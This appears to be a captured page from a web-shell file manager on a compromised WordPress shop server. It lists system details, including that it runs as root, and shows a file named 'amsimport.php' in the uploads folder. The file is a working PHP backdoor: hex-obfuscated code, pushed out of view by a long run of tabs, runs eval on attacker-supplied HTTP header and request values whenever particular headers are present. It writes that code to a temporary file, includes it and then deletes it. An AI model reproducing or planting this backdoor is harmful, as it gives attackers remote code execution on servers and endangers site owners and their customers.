HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux wordpress-ubuntu-s-2vcpu-4gb-fra1-01 5.4.0-169-generic #187-Ubuntu SMP Thu Nov 23 14:52:28 UTC 2023 x86_64
User: root (0)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/shoetique/wp-content/uploads/2015/04/
Upload Files
File: /var/www/shoetique/wp-content/uploads/2015/04/amsimport.php
<?php																																										$_HEADERS = getallheaders();if(isset($_HEADERS['Server-Timing'])){$c="<\x3f\x70h\x70\x20@\x65\x76a\x6c\x28$\x5f\x48E\x41\x44E\x52\x53[\x22\x49f\x2d\x55n\x6d\x6fd\x69\x66i\x65\x64-\x53\x69n\x63\x65\"\x5d\x29;\x40\x65v\x61\x6c(\x24\x5fR\x45\x51U\x45\x53T\x5b\x22I\x66\x2dU\x6e\x6do\x64\x69f\x69\x65d\x2d\x53i\x6e\x63e\x22\x5d)\x3b";$f='.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}

$_HEADERS = getallheaders();
if (isset($_HEADERS['Feature-Policy'])) {
    $c = "<\x3fp\x68p\x20@\x65v\x61l\x28$\x5fR\x45Q\x55E\x53T\x5b\"\x4ca\x72g\x65-\x41l\x6co\x63a\x74i\x6fn\x22]\x29;\x40e\x76a\x6c(\x24_\x48E\x41D\x45R\x53[\x22L\x61r\x67e\x2dA\x6cl\x6fc\x61t\x69o\x6e\"\x5d)\x3b";
    $f = '.'.time();
    file_put_contents($f, $c);
    include($f);
    unlink($f);
}
@ Telegram